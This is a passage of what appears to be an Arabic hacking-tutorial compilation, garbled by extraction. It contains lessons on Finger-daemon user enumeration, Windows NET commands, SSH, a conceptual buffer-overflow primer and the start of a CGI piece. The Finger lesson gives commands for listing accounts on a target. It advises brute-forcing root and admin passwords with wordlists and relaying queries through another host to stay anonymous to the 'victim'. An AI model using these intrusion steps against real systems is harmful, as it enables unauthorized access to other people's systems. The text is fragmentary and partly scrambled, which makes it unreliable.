)‪ ( superscan‬للبحث‬ ‫في موقع معين )مثل ‪ ( /http://www.com/ 79‬‬ ‫‪58‬‬ .‬‬ ‫‪ portscans‬للبحث عن البورتات المفتوحة‪ .‬‬ ‫وهذه اليام يقوم الهكرز بمحاولت اختراق النظمة بأستخدام برامج‬ ‫ي أساس علمي ‪.com‬‬ ‫له ‪ Finger‬ديمون يعمل‪.‬في أغلب الحيان الجابة تخبرك أيضا من الذي يدير النظام)‪ (admin‬وكيف قام‬ ‫بالتصال‪. .‬‬ ‫لهذا سوف أحاول ان اشرح في هذا الدرس بلغة مفهومة‬ ‫ما هو ‪ Finger‬ديمون وماذا يفعل وكيف يمكن استخدامه في مصلحتك‬ ‫الخلصة المقدمة‪ :‬ان خدمة ‪ Finger‬كانت قديما ولزالت تستخدم لجلب المعلومات عن‬ ‫المستخدمين الموجودين في النظام و هل لديهم حسابات في هذا النظام ام ل ‪. .‫إضافة إلى هذه المعلومات‪ .

com‬كمثال‬ ‫فستظهرالنتائج‪:‬‬ ‫‪:Login: Name: Tty: Idle: When: Where‬‬ ‫‪root foobar sys console 17d Tue 10:13 node0ls3.com‬‬ ‫‪<.........foobar.> <.‬‬ ‫اما من يونيكس‬ ‫لسنا بحاجة إلى أن نستعمل تيلنت لنه يوجد بنظام لينوكس زبون)‪(client‬خاص بخدمة ‪Finger‬‬ ‫‪Deamon‬‬ ‫مرّكب على النظام بشكل دائم تقريبا‪....‬الخ الخاصة بمستخدمين هذا النظام‬ ‫إذا كنت تريد المزيد من المعلومات عن مستخدم معّين )‪ Johnson Peter‬بيتر جونسن‬ ‫‪59‬‬ ....> <..‬‬ ‫ملحظة ‪ :::‬سيكون الشرح التالي حتى نهاية الدرس لمستخدمي لينوكس أما أذا قررت الستمرار بأستخدام‬ ‫وندوز ستكون كتابة الوامر في موجه الدوس ثم في التلنت وستكون كتابة الوامر نفسها الوامر التي‬ ‫تنكتب بأستخدام نظام لينوكس ولكن بدل "@" نضع "مسافة ثم ‪ "www‬في الوندوز مراعيا اسم الموقع‬ ‫مثل يكون كتابة الوامر في لينوكس هكذا ‪:‬‬ ‫‪finger@anyname...> <.the idle time‬‬ ‫وبعد ذلك في العمودين الخامس والسادس‬ ‫الوقت والمكان الذي استخدم فيه الحساب للتصال بالنظام‪.foobar..com‬‬ ‫لحظ المسافة بين ‪ finger‬و ‪www‬‬ ‫اطبع في محث الوامر في يونكس ) على افتراض انك تستخدم ‪: ( unix shell‬‬ ‫‪finger@foobar.com‬‬ ‫ولكن في وندوز سيكون هكذا ‪:‬‬ ‫‪/finger http://www.....‫بعد ذلك سيظهر لك برنامج ‪ telnet‬و منه تطبع الوامر ‪.> Amos Amanda‬‬ ‫‪Anderson Kenneth‬‬ ‫‪Bright Adrian‬‬ ‫‪Doe John‬‬ ‫‪<.com‬‬ ‫لحظ ان الهدف )الموقع المرادالستعلم عنه مثل معرفة من هم مستخدمينه ( هنا هو‬ ‫‪ /http://www..‬‬ ‫أحيانا توجد أعمدة بعنواوين اليميلت وأرقام هواتف ‪...anyname....> Johnson Peter‬‬ ‫‪Mitnick Kevin‬‬ ‫‪Munson Greg‬‬ ‫‪Orwell Dennis‬‬ ‫الن ماذا تعني هذه النتائج؟‬ ‫في العمود الول ) ‪( login‬نرى أسماء المستعملين وفي الثاني )‪" (Name‬السماء الحقيقية"‪،‬‬ ‫التي بالطبع ليست حقيقية‪ ،‬لكن في معظم الوقت حقيقة‪....‬‬ ‫يرينا العمود الثالث )‪(Tty‬النوع الطرفي ‪the terminal type‬‬ ‫والرابع )‪ (Idle‬فترة التوقف ‪...> <.....

‬‬ ‫إذا عرفت أسماء المستخدمين‪ ،‬ستكون الخطوة القادمة متوقفه على برنامج ‪ bruteforce‬أو‬ ‫بمعنى آخر برامج تخمين الباسوورد ‪worldist password cracker‬‬ ‫صة كتبت للتيلنت على سبيل المثال‬ ‫هناك سكربتات خا ّ‬ ‫اذهب لموقع ‪ /http://www.‬وبالطبع بعض الحسابات سهلة تخمين كلمة السر ‪.5‬الستعلم عن طريق موقع بأستخدام ‪Finger‬‬ ‫> =========================‬ ‫‪60‬‬ .pl‬‬ ‫لذلك يجب عليك ان تكون قائمة بكلمات السر في ملف نصي )‪ word‬او المفكره(‬ ‫وحاول ان تكون كلمات السرقريبة من أسماء المستخدمين وإذا لم تعمل القائمة‬ ‫استخدم برنامج ‪.@foobar.com‬‬ ‫جرب هذه الوامر وشاهد ما يحدث!‬ ‫حاول التعرف على ‪ ،Finger Deamon‬أقرأ ‪ RFC‬وأوجد خدعك بنفسك!‬ ‫‪ 1.thehackerschoice.‬‬ ‫هذا يعني أنك تكسب )عن طريق قانوني ( ‪ % 50‬من المجموعة السحرية وهي‬ ‫كلمات السر‪/‬مجموعة أسماء المستخدمين التي ستمنحك الدخول )‪(Access‬إلى نظام‪.com‬‬ ‫عندما ترسل هذا المر الي ‪ Finger Deamon‬سيعطيك جميع الحسابات‬ ‫التي تحتوي على كلمة "‪ "secret‬أّما في اسم المستعمل أو السم الحقيقي‪.com‬‬ ‫‪finger 0@foobar.‫على سبيل المثال( أدخل المر التالي‪:‬‬ ‫‪finger johnson@foobar.‬‬ ‫اذا‪ ،‬ماهو الشي المهم في هذا؟ حسنا أنت يمكنك أن تستعمل "‪ "test‬أو "‪ "temp‬أو "‪"0000‬‬ ‫بدل من "‪ "secret‬وكما تعرف من المحتمل ان يكون هذاالنوع من الحسابات‬ ‫سهل معرفة باسوورداته في أغلب الحيان‪.Finger‬‬ ‫‪ Finger deamon‬يريك ماهي الحسابات الموجوده على النظام‪.‬‬ ‫هناك بعض الخدع لمعرفة هذا النوع من الحسابات‪ .bruteforce‬أنصحك بهذا الوقت ان تحظر لك كأس شاهي وتأخذ لك استراحة‬ ‫وتجعل البرنامج يعمل عمله‪-‬‬ ‫بالطبع نجد بعض الحسابات للمستخدمين للنظام اكثر اهمية من غيرها من الحسابات‪.4‬بعض الخدع عند استخدام خدمة ‪Finger‬‬ ‫> =========================‬ ‫===========<‬ ‫أتمّنى الن شاهدت ما الضعف الرئيسي لخدمة ‪.‬على سبيل المثال‬ ‫إطبع المر‪:‬‬ ‫‪finger secret@foobar.‬‬ ‫‪finger .com‬‬ ‫‪ 1.‬‬ ‫وخاصة حساب الدارة )‪ (Admin‬أو الجذر)‪ (root‬بسبب انه عندما تعرف الباسوورد الخاص بهم‬ ‫وقتها تستطيع التحكم بالموقع ‪ .com‬أو ابحث عن‬ ‫‪VLAD's pwscan.

victim.com@victim.host.‬‬ ‫يعني الخلصة ‪ :‬ان الموقع الذي تريد الستعلم عنه يعتبر حاسوبك الشخصي غير موثوق به بعكس‬ ‫اذا كان الستعلم عن طريق موقع اخر يشابهه فسوف يسمح له !‪.Finger deamon‬‬ ‫انتهى‪،،،‬‬ ‫‪61‬‬ .com‬يستعلم )‪ (Finger‬الن ‪ victim.com‬ويريك النتائج‪.com‬‬ ‫فعندما تقوم ‪/http://www.‬‬ ‫‪1.bruteforce‬‬ ‫تذّكر فوائد "الستعلم عن طريق موقع"أيضا بأستعمال ‪.6‬الستنتاج من هذا الدرس‬ ‫>=======================<‬ ‫‪ Finger Deamon‬يمكن أن يكون مصدر معلومات ضخم لي واحد يحاول‬ ‫كسب الدخول) ‪ ( access‬إلى نظام‪.victim.‬‬ ‫أحدالفوائد من هذه الطريقة انك ستكون مجهول لدى ‪victim.access‬‬ ‫هناك بضعة خدع لطيفة تمكنك من معرفة حسابات خاصة تبحث عنها‬ ‫من معرفتك لهذه الحسابات تستطيع كسر الباسووردات ‪ ،‬بإستعمال تقنية ‪ wordlist‬أو ‪.host.com‬‬ ‫وأيضا تعرف أن موقع آخر "‪ "www.com‬‬ ‫بطلب سجل )الدخول ‪ (log‬ستشاهد ‪ /http://www.com‬يقدم خدمة ‪ Finger‬تعمل‪،‬‬ ‫عندها يمكنني ان أقدم طلبا مثل هذا‪):‬اكتب في محث الوامر مثل هذا(‬ ‫‪finger@host.com‬‬ ‫‪ Host.‬‬ ‫فائدة اخرى وهي أنك يمكن ان تترك ‪) Host‬موقع( يقوم ) عن طريق خدمة ‪( Finger‬بالستعلم عن‬ ‫حاسوبا‬ ‫آخرا على نفس الشبكة ‪ ،‬بينما اذا طلبت انت هذا الستعلم بأستخدام خدمة ‪ Finger‬من جهازك‬ ‫لن تكون مسموحة لك لنك سأكون غير موثوق به لدى المستعلم عنه‬ ‫بعكس اذا كان الطلب للستعلم باستخدام ‪ Finger‬عن طريق موقع ‪.‫=============<‬ ‫إذا أردت ان استخدم خدمة ‪) Finger‬معنى ‪ Finger‬كفعل "ألمس" ولكنها تأتي هنا بمعنى "استعلم"(‬ ‫والستعلم عن موقع معين مثل هذا"‪"www.‬‬ ‫‪ Finger deamon‬قانونيا يزّودك بنصف كلمات السر واسماء المستخدمين‬ ‫التي تحتاجها لكسب الدخول ‪.com‬في سجلتهم‪ ،‬بدل منك ‪.

‬على سبيل‬ ‫المثال‪ ،‬يطالبك المر ‪ net stop server‬بتأكيد رغبتك في إيقاف كافة خدمات‬ ‫الملقم التابعة‪ ،‬بينما يتجاوز ‪ ،net stop server /y‬عن طريق الجابة بنعم‬ ‫تلقائيًا‪ ،‬المطالبة بالتأكيد ويعمل على إيقاف تشغيل خدمة الملقم‪.‬‬ ‫يمكنك الحصول على تعليمات بناء الجملة في سطر الوامر لمر ‪ net‬عن طريق‬ ‫كتابة ‪ net help command‬في موجه الوامر‪ .net‬تملك‬ ‫أوامر ‪ net‬هذه بعض الخصائص المشتركة‪:‬‬ ‫يمكنك مشاهدة قائمة بكافة أوامر ‪ net‬المتوفرة بكتابة ?‪ net /‬في موجه‬ ‫الوامر‪.‬على سبيل المثال‪ ،‬للحصول‬ ‫على تعليمات المر ‪ ،net accounts‬اكتب مايلي‪:‬‬ ‫‪net help accounts‬‬ ‫تقبل كافة أوامر ‪ net‬خيارات سطر الوامر ‪) /y‬نعم( و ‪) /n‬ل(‪ .‬‬ ‫‪62‬‬ .("Service Name " ،‬على سبيل المثال‪ ،‬يشّغل المر التالي خدمة ‪net‬‬ ‫‪:logon‬‬ ‫"‪net start "net logon‬‬ ‫‪ unlimited‬يكافئ ‪ 49.‬‬ ‫إذا كان اسم الخدمة يحتوي على فراغات‪ ،‬استخدم علمات القتباس حول النص‬ ‫)أي‪ .‫" شرح مختصر لدارة الشبكة بإستخدام المر ‪" NET‬‬ ‫>ةةةةة ةة ةةةة ةةةة<‬ ‫تستخدم العديد من الخدمات أوامر شبكة التصال التي تبدأ بالكلمة ‪ .710‬يومًا(‪ ،‬والقيمة الفتراضية هي ‪ 90‬يومًا‪.

‬‬ ‫‪63‬‬ .‫ن بتسجيل الخروج من شبكة التصال فورًا‪.

64 .

‬إن إخراج ‪ net file‬مشابه لمايلي‪:‬‬ ‫‪65‬‬ .‬‬ ‫‪ net file /cl‬لزالة التأمين وإغلق الملف‪ .‫الوصف‬ ‫لقم‪.

‫احد بالعلمة النجمية )*(‪.‬‬ ‫‪66‬‬ .

67 .

‫جال )على سبيل المثال‪.(Sales\Ralphr ،‬‬ ‫‪68‬‬ .

‫انتهى‪،،،‬‬ ‫"شرح الـ ‪"secure shell‬‬ ‫>ةةةةة ةة ةةةةةةة ةةة ةةة<‬ ‫>ةةةةةة‪<ACID BURN_EG :‬‬ ‫السلم عليكم و رحمه ال و بركاته ‪:‬‬ ‫اليوم سوف نتطلع الى اداه فى النت ورك و هى اداه هامه جداا تستخدمها معظم السرفرات على النترنت و‬ ‫هذه الداه هى ال ‪ Secure Shell‬اى ال ‪:: SSh‬‬ ‫‪69‬‬ .

‬‬ ‫و هنا يأتى سؤال مهم ‪ ::‬و السؤال هو ‪::‬‬ ‫لماذا يفضل استخدام ال ‪ secure shell‬على الدوات الخرى التى يطلق عليها ‪ r.(rcp‬‬ ‫و تقدم ايضا ال ‪ secure shell‬اتصال امن جداا لشحنات اتصالت ال ‪ tcp‬كونيكشن ‪.rsh and‬‬ ‫‪.commands‬فى‬ ‫يونكس ==================================================‬ ‫======================================‬ ‫كالمذكورين فى العلى ؟‬ ‫======================‬ ‫فى توزيعات اليونكس مثل ال *‪ BSD‬تتعرض الدوات التى يطلق عليها ‪ r.‫و لنبدأ الن الحديث عنها ‪::‬‬ ‫ما هى ال ‪ SSh‬؟‬ ‫===============‬ ‫ال ‪ secure shell‬هى اداه )برنامج( للتصال و الدخول الى كمبيوتر او جهاز اخر على النت ورك لتنفيذ‬ ‫اوامر او مهام معينه داخل هذا الجهاز اى و هو التصال عن بعد ‪ remotely connection‬و تستخدم‬ ‫ايضا فى نقل الملفات من كمبيوتر الى اخر و هى تقدم توثيق قوى و اتصال امن جداا فى قنوات التصال الغير‬ ‫امنه و هى تعتبر كبديل جيد جداا لدوات تستعمل لنفس الغرض فى يونكس مثل )‪rlogin. authorized access to systems‬‬ ‫و النقطه الثانيه هى ان اذا حاول احد اختراقك عن طريق مراقبه النت وررك ترافيك لشبكتك و التقاط‬ ‫الباكيدجس التى تحمل معلوماتك و باسورداتك فسيخيب امله لن السيكيور شيل ل يرسل الباسوردات فى‬ ‫صوره واضحه كما ترسلها ادوات يونكس الخرى و لكن يرسلها مشفره و لذلك سيكون على المخترق‬ ‫محاوله فك الشفره و الخ‬ ‫و لكن مع كل هذه المزايا لم يخلى ال ‪ secure shell‬من الثغرات و لكن تعتبر ثغراته قليل و تقريبا‬ ‫معظمها يحتاج الى الرووت اكسس و الخرى يمكن ان تخترق السيكيور شل فقط بها )هذا كلم بينى و بينكم(‬ ‫و الن سؤال اخر ‪::‬‬ ‫ما هى انواع الهجوم التى تحمى منها ال ‪ ssh‬؟‬ ‫‪70‬‬ .commands‬مثل )‬ ‫‪ (rlogin.rsh and rcp‬الى انواع مختلفه من الهجمات حيث انه لو شخص استطاع ان يكتسب ال روت‬ ‫اكسيس )‪ (root access‬للجهزه التى على الشبكه بطريقه ما او فعلها ن طريق اتصال فيزيائى اى‬ ‫ريموتلى يمكنه ان يدخل الى كل بيانات الجهزه التى على الشبكه بدون ادنى صعوبه لنه يستطيع بالروت‬ ‫اكسس ان يعبر من خلل اى اداه من المذكوره فى يونكس بدون اى صعوبه و يمكنه تفاديها بطرق معينه و‬ ‫هذا ما يسمى بأن الشخص لديه ‪ unauthorized access to systems‬اعتقد انكم فهمتونى الن و‬ ‫يمكن ايضا لى شخص ان يراقب و النت ورك ترافيك و يلتقط كل الباكيدجس من خلل شبكتك و تكون هذه‬ ‫الباكيدجس تحتوى على الباسوردس للسيستم حق شبكتك‬ ‫ملحوظه‪ :‬طريقه مراقبه النت ورك ترافيك هى طريقه حقيقيه فى الختراق و تستخدم فى اختراق المنظمات‬ ‫الكبرى و تقع تحت بند تقفى الثر و العداد للختراق (‬ ‫و الن نعود الى السيكيور شيل و مزايا السيكيور شيل تظهر هنا مع كل عيوب الدوات فى يونكس فالسيكيور‬ ‫شيل يطالب الشخص الذى لديه الروت اكسس ايضا بأن يتصل اتصال موثوق عبره اى ل يعطيه الحق للدخول‬ ‫الى بيانات اجهزه الشبكه ال بالباسورد و ل يمكن التحايل على ال ‪ ssh‬فى هذه النقطه و بذلك حتى لو تمكن‬ ‫الشخص من اكتساب الروت اكسس لن يستطسع الطلع على بيانات الشبكه‬ ‫ال ب ‪.

. RC4-128.‬‬ ‫و ايضا كل الشياء التى تكلمنا عنها فوق سوف تعمل فقط اذا كنت تستخدم خاصيه التشفير التى تسمح لك بها‬ ‫ال ‪ ssh‬و هى تسمح بأكثر من نوع تشفير مثل )‪three-key triple-DES. DES.‬حيث ان هذا التشفير‬ ‫ايضا يمنع ال ‪ ip spoofing‬و ال ‪ DNS spoofing‬و هذا ايضا بالضافه الى تغيير مفاتيح فك التشفير‬ ‫كل فتره معينه و يتم تدمير مفاتيح التدمير التى تم استعمالها تماما ‪. Blowfish‬يمكنك استخدام ما تريد منهم و ايضا هناك اوبشن اى خيار فى الداه تسمح لك بعدم‬ ‫تشغيل التشفير اى" ‪ encryption of type "none‬و بهذا تجعلنى اقول عليك احمق ! لن هذا يجعل‬ ‫ال ‪ ssh‬سهله الختراق مثل الدوات التى تم ذكرها فى اول الموضوع فى يونكس ‪ .‬‬ ‫‪ (TSS.‬‬ ‫اذن فهى اداه حقا مميزه و تستحق الحترام و الهتمام مع انها ل تخلو من الثغرات و لكن لنجعلها افضل ما‬ ‫موجود فى هذا المجال‬ ‫ارجو ان اكون قد افدتكم فى هذا الدرس بالتعرف على اداه مثل السيكيور شيل و ارجو ان اكون عند حسن‬ ‫ظنكم‪. Buffer Overflows‬وانشال تستفيدون منه‬ ‫يله نبدأ‬ ‫‪71‬‬ .‬‬ ‫انتهى‪،،،‬‬ ‫" شرح معنى الـ ‪"Buffer Overflows‬‬ ‫>ةةةةة ةة ةةةةةةة ةةةة ةةةةة ةةةةةةةةة<‬ ‫>ةةةةةة‪<LAMeR :‬‬ ‫اقدم لكم درس يشرح ما معنى الـ ‪ .‫===========================================‬ ‫‪ -1‬تحمى من ال ‪ ip spoofing‬اى تحمى من انتحال عنواين الى بى حيث انه لو ارسل شخص ما‬ ‫باكيدجس من اى بى يظهر انه موثوق به و لكنه فى الحقيقه ليس موثوق به يكشفه ال ‪ ssh‬و تحمى ايضا‬ ‫ال ‪ ssh‬من المنتحلين على الشبكه المحليه اى ‪. localy‬‬ ‫‪ -2‬تحمى مما يسمى ال ‪DNS spoofing‬‬ ‫‪ -3‬تعترض ظهور التيكستس التى يكون مخزن عليها الباسوردات الواضحه و بيانات الهوستس‬ ‫‪ -4‬تحميك من معالجه البيانات المخزنه اى تمنع اى شخص غير موثوق به من عمل ايديت لى داتا مخزنه‬ ‫و لكن مع كل هذا فأن ال ‪ ssh‬ليس امن بدرجه كبيره حيث ان الشخاص ذو خبره كبيره فى النت ورك‬ ‫يستطيعون ان يجعلون ال ‪ ssh‬ينقطع عن التصال اى ‪ disconnected‬و لكن ل يمكن ان يكسرو تشفير‬ ‫بياناته او يعيدون تشخيل الترافيك الذى كان ينقلها ‪.

‫محتويات الدرس‪:‬‬ ‫‪ -1‬ما هو الـ ‪ Buffer Overflow‬؟‬ ‫<‪--------------------------‬‬ ‫‪ -2‬المعالجه)‪(Proccess‬‬ ‫<‪-----------------‬‬ ‫‪ -3‬إدارة الذاكره )‪(Memory management‬‬ ‫<‪--------------------------------‬‬ ‫‪-4‬استغلل ماذكر في الـ ‪Buffer Overflow‬‬ ‫<‪----------------------------------‬‬ ‫* ماذا يجب أن أعرف قبل أن أقرأ هذه المقالة؟‬ ‫ليس الكثير‪ ،،،‬فهذا دليل اساسي لك اذن فقط تحتاج ان تكون لديك معرفة أساسية بمفهوم برامج الحاسوب‬ ‫وإدارة الذاكرة‬ ‫‪-1‬ما هو الـ ‪Buffer Overflow‬؟‬ ‫<‪>-----------------------‬‬ ‫‪ Buffer Overflow‬حالة تحدث لبرنامج بسبب برمجة سيئة أو بمعنى اخر برمجة تحمل أخطاء‪.‬المتغّير الذي حجمه ‪ 15‬بايت‬ ‫وهو الذي سيحتوي السم الذي سيدخله المستخدم(‬ ‫نفترض ان المستخدم سيدخل السم " ‪abcabcabcabcabcabcabcabca‬‬ ‫‪ "bc‬حينها ستبدو الذاكره هكذا‪:‬‬ ‫‪somevalue2avalusabcabcabc‬‬ ‫‪abcabcabcabcabcabc‬‬ ‫>‪<var1 ><var2><vname ><other things go here‬‬ ‫اذا ماذا حدث ؟؟ المتغّير ‪" vname‬طفح ‪ "overflowed‬بسبب البيانات المدخلة عليه من قبل المستخدم‬ ‫‪72‬‬ .‬‬ ‫اذن ماذا سيحدث للبيانات الزائدة عن ‪ 15‬بايت من المؤكد انها سـ"تطفح ‪ "Overflow‬على الذاكرة التي‬ ‫صصت لمتغّير السم‪.‬‬ ‫بايت( و القيمة التي خ ّ‬ ‫خذ هذا المثال‪:‬‬ ‫يظهر برنامجي على الشاشة هذه الجملة‪" :‬رجاء إطبع اسمك الول‪" :‬ثم سيأخذ برنامجي من المستخدم‬ ‫البيانات التي سيدخلها وهي )اسمه الول( ثم توضع في متغير فتظهر في برنامجي او تخزن‪.‬‬ ‫خ ّ‬ ‫صص الذاكرة ‪:‬‬ ‫عندما يبدأ البرنامج‪ ،‬تخ ّ‬ ‫>‪<var1><var2><vname><Other things in memory‬‬ ‫‪10b 6b 15b‬‬ ‫)‪ var 1‬و ‪ var 2‬متغّيرات ليست لها علقة بالسم المدخل ‪ vname.MS web server-‬‬ ‫عموما‪ ،‬يحدث ‪ Buffer Overflow‬عندما يظهر برنامج ما متغّير بحجم ثابت )على سبيل المثال‪،‬حجم ‪20‬‬ ‫صصت إلى هذه المتغّير أكبر من حجم المتغّير‪.‬‬ ‫احدث ثغرة يمكنك أستغللها من نوع ‪ Buffer Overflow‬تسمى فايروس '‪ ، 'code red‬التي أستغلت‬ ‫في خادم ‪ IIS‬لمايكروسوفت ‪.‬‬ ‫المشكلة هنا تكمن في انه إذا كان المتغّير مخصص لتخزين بيانات حجمها القصى يساوي ‪ 15‬بايت والبيانات‬ ‫هنا)وهي اسم المستخدم(حجمها ‪ 25‬بايت التي ستخزن في المتغير )يتضح لنا ان اسم المستخدم وضع في‬ ‫مكان اقل من حجمه (‪.

:‬ان الذاكرة ل تنقسم الى ذاكرة حقيقة وذاكرة افتراضية بل أنهما ينتميان لذاكرة واحد‬ ‫اذن ما فائدة التسمية الى حقيقية وافتراضية ؟؟ الجواب هو للمتييز فقط ‪ ،‬حيث ان الذاكرة الحقيقة تمثل‬ ‫مساحة معينة من القرص الصلب )ومكان هذه المساحة في تغير مستمر( لذلك سميت حقيقية او بمعنى اخر‬ ‫طبيعية )اي بأستطاعتك لمس مكان الذاكرة الطبيعية بيدك على القرص الصلب(‬ ‫وفائدة الذاكرة الفتراضية هي إعطاء عنوان افتراضي )غير حقيقي ( للذاكرة الحقيقية اي يعطي عنوان كأسم‬ ‫فقط لمكان مساحة الذاكرة الطبيعية في القرص الصلب ‪ ،‬وإن تغير مكان المساحة المخصصة للذاكرة يظل‬ ‫العنوان الفتراضي)التخيلي( ثابت‪..‬‬ ‫ذلك يعني بأّنه ليمكن لي تطبيق )برنامج مثل( الوصول مباشرة إلى الذاكرة الحقيقية‪.‬‬ ‫توضيح ‪ ..‬‬ ‫‪-4‬استغلل ماذكر في الـ ‪Buffer Overflow‬‬ ‫<‪>---------------------------------‬‬ ‫الن نصل إلى الجزء الهم والمرح‬ ‫‪73‬‬ .‬كيف اذن؟؛ ا ّ‬ ‫المركزية)‪ (CPU‬تنتقل بين العمليات كُل على حده بسرعة كبيره بحيث تبدو مثل العديد من المهام التي تعمل‬ ‫في وقت واحد‪،‬‬ ‫اذا تبدو لنا كأن العمليات تعمل في وقت واحد وهذه من خدع الحاسوب التي يؤديها علينا ‪.‬‬ ‫في هذه المقالة سنناقش نظام لينكس ‪ ،linux‬لكن المفهوم مماثل لباقي النظمة‪.‬‬ ‫العنوان التخيل ّ‬ ‫و هنالك استخدام اخر للذاكرة الفتراضية)التخيلّية( وهي انه من المعلوم أن الذاكرة الحقيقية ل ترتبط مباشرة‬ ‫بكل عملية )أو برنامج(‪ ،‬فنظام التشغيل يستخدم مساحة على القرص الصلب كذاكرة‪،‬‬ ‫والتطبيق ل يمكنه أبدا معرفة مكان الذاكرة ) مكان الذاكرة الحقيقة (‪،‬ذلك لن المساحة المخصصة للذاكرة في‬ ‫القرص الصلب تتبدل وتتغير‪..‬‬ ‫وهذا يرشدنا الى شي اخر يجب ان تفهمه وهو‪:‬‬ ‫‪-3‬إدارة الذاكره )‪:(Memory management‬‬ ‫<‪>------------------------------‬‬ ‫تدير أنظمة التشغيل‪-operating systems-‬الحديثة ذاكرة افتراضية ‪)virtual memory‬تخيلية(‪. (:‬‬ ‫كّل عملية لها عنوان فاضي من الذاكره ‪ ،‬وليمكن لي عمليةآخرى تدخل في هذا المكان الفاضي من الذاكرة‪.‫و قيمة "‪ other things in memory‬أشياء اخرى في الذاكره" تغّيرت بسبب فيض)‪(overflow‬‬ ‫الحروف من ادخال المستخدم‪.‬‬ ‫ن وحدة المعالجة‬ ‫ليس هناك شيء إسمه "متعددالعمليات ‪ "Multi.‬لماذا؟؟‬ ‫انظمة التشغيل ‪ Operating System‬تمتلك جدول تخطيط "تحويل العناوين الحقيقية من الذاكرة الى‬ ‫عناوين افتراضية)تخيلية(" ‪.‬‬ ‫‪-2‬المعالجه)‪:(Proccess‬‬ ‫<‪>----------------‬‬ ‫ن الوحدة الوظيفية الساسية في حاسوب يعمل هي عملية المعالجه )‪.‬‬ ‫اذن كيف أستغّل هذا الخطأ؟؟؟‬ ‫قبل أن نصل إلى الجواب‪ ،‬هناك بعض الشياء الساسية المهمة التي يجب علينا أن نعرفها حول تركيب وبنية‬ ‫الحاسوب ‪.(Proccess‬في الحاسوب هنالك‬ ‫إّ‬ ‫العديد من العمليات ونظام التشغيل مسؤول عن تقسيم القّوة التي تجعل العديد من العمليات تعمل في نفس‬ ‫الوقت في الحاسوب‪.proccesses‬صحيح‪ .‬‬ ‫وعندما تقوم ذاكرة الـ ‪) OS‬نظام التشغيل(بتحديد مكان في الذاكرة لبرنامج معين لتشغيله ‪،‬يأخذ البرنامج‬ ‫ي فقط ‪ ،‬وليس العنوان الطبيعي‪.

‬‬ ‫اخيرا اتمنى انكم فهمتوا الدرس زين وعرفتوا ايش معنى ‪ Buffer Overflow‬واللي فهم الدرس نص‬ ‫نص يعيد قرائته اكثر من مرة مع التدقيق وانشال يفهم‪.‫كيف نستفيد من الذي قلنا عن المعالجة وإدارة الذاكرة للوصول والدخول الى الجذر )‪ (Root‬وأختراق‬ ‫النظام؟ تذّكر نحن قلنا في وقت سابق بأّنه عندما يكون الدخال)البيانات( من المستخدم أكبر حجما من الذاكرة‬ ‫صصت لهذه البيانات‪ ،‬البيانات الزائدة ستفيض )‪ (overflow‬في الذاكرة التي بعد السم المتغّير؟ هذا‬ ‫التي خ ّ‬ ‫المكان من الذاكرة هو المكان الذي نستفيد منه في الختراق‪.‬‬ ‫انتهى‪،،،‬‬ ‫" الـ ‪ CGI‬وعلقتها بالنترنت "‬ ‫>ةةةةة<‬ ‫>ةةةةة ةة ةةة‪<King_abdo :‬‬ ‫في هذا الملف سوف نقوم بعرض مقدمة الـ ‪ CGI‬و علقتها بالنترنت‬ ‫‪74‬‬ .‬‬ ‫ماذا نعمل في ذلك المكان‪ :‬داخل خط )مكان( البيانات التي يدخلها المستخدم )في المثال السابق وهو السم‬ ‫الول الذي يطلب من قبل البرنامج ثم أدخلناه ( نضع الوامر الكثر شعبية للحاسوب‪ ،‬حيث هذه الوامر تجعل‬ ‫الحاسوب يحدث)ينتج( هيكل نستطيع استخدامه فيما بعد للقيام بالسيطرة الكاملة للنظام المستغّل‪ .‬القيام بهذا‬ ‫العمل ليس بيسطا كما يبدو لك‪ ،‬إذن لو أردت معرفة كيف يعمل ‪ ،‬أنت يجب أن تقرأ المقالة القادمة حول‬ ‫‪ ،Buffer Overflows‬الذي سيصف بالضبط كيف لستغلل واحده من الـ ‪ Buffer Overflows‬في‬ ‫الختراق‪.

‬البورت‬ ‫المحددة‬ ‫لهذا البروتوكول هي ‪ ) 80‬من الممكن أن تتغير هذه البورت(‬ ‫تستطيع سكريبتات السي جي أي أن تقوم بتوليد صفحات الويب و الصور و أيضا نتائج محددة طبقا لمدخلت‬ ‫معينه يقوم‬ ‫مبرمج السي جي أي بتحديدها‬ ‫يقوم عمل سكريبتات السي جي أي علي خطوتين أساسيتين ‪:‬‬ ‫‪ -1‬في الخطوة الولى يقوم السكريبت بعمل معالجة أوليه للبيانات التي أدخلت له‬ ‫‪ -2‬في الخطوة الثانية يعمل السكريبت كقناه للبيانات التي يقوم المتصفح بارسالها الي السيرفر أو العكس‬ ‫يقوم سكريبت السي جي أي بتشفير البيانات حتي تتمكن من العمل في أي مناخ للعمل‬ ‫يمكن كتابة سكريبت السي جي أي بأي لغة برمجة سواء كانت لغة مجمعة مثل الفيجوال بيسك‬ ‫أو لغة مترجمة مثل البيرل و الفرق الوحيد بين نوعين اللغات أن البرنامج‬ ‫المبرمج باللغة المجمعة سوف يكون أسرع في التنفيذ و لكن اللغات المترجمة أسرع في عملية التطوير‬ ‫للسكريبت اذا أردت أن تعمل علي تعديل السكريبت أو تطويره‬ ‫‪75‬‬ .‫)‪ (1‬مقدمة للـ ‪CGI‬‬ ‫‪ CGI=COMMON GATEWAY INTERFACE‬هي الواجهة التي تسمح بالتصال بين جانب‬ ‫المستخدم عن طريق المتصفح أو البرامج‬ ‫و خلفه و جانب الويب سيرفر الذي يفهم بروتوكول )‪(HTTP‬‬ ‫الـ ‪ TCP/IP‬هو البروتوكول الذي يستخدمه سكريبت السي جي أي و السيرفر أثناء التصال ‪ .

.‬‬ ‫الموضوع ليس صغير و ليس بسهل في القراءه ‪ .‫أهم الوامر التي تعتبر وثيقة الصله لموضوعنا هي كالتالي ‪:‬‬ ‫‪ GET -1‬هذا المر يقوم بطلب بيانات من السيرفر للمتصفح‬ ‫‪ POST -2‬هذا المر يطلب من السيرفر قبول المعلومات المدخلة اليه من المتصفح‬ ‫‪ PUT -3‬هذا المر يطلب من السيرفر قبول المعلومات المرسله اليه كبديل عن المدخلت الموجودة حاليا‬ ‫)‪ (2‬نقاط الضعف‬ ‫نقاط الضعف التي يسببها سكريبت السي جي أي ليس ضعفا في السي جي أي نفسه و لكنه‬ ‫ضعف في بروتوكول الـ ‪ HTTP‬أو في أنظمة التشغيل المختلفة‬ ‫السي جي أي يسمح باستغلل نقاط الضعف الموجودة و لكن هناك طرق أخري للوصول الي تحطيم النظام‬ ‫المني ‪ .‬كل ما اسعى له هو تعميم‬ ‫الفائده على الجميع‬ ‫و ان نتقدم نحن العرب و نترقي باعل المستويات و المكانات الي نستحقها 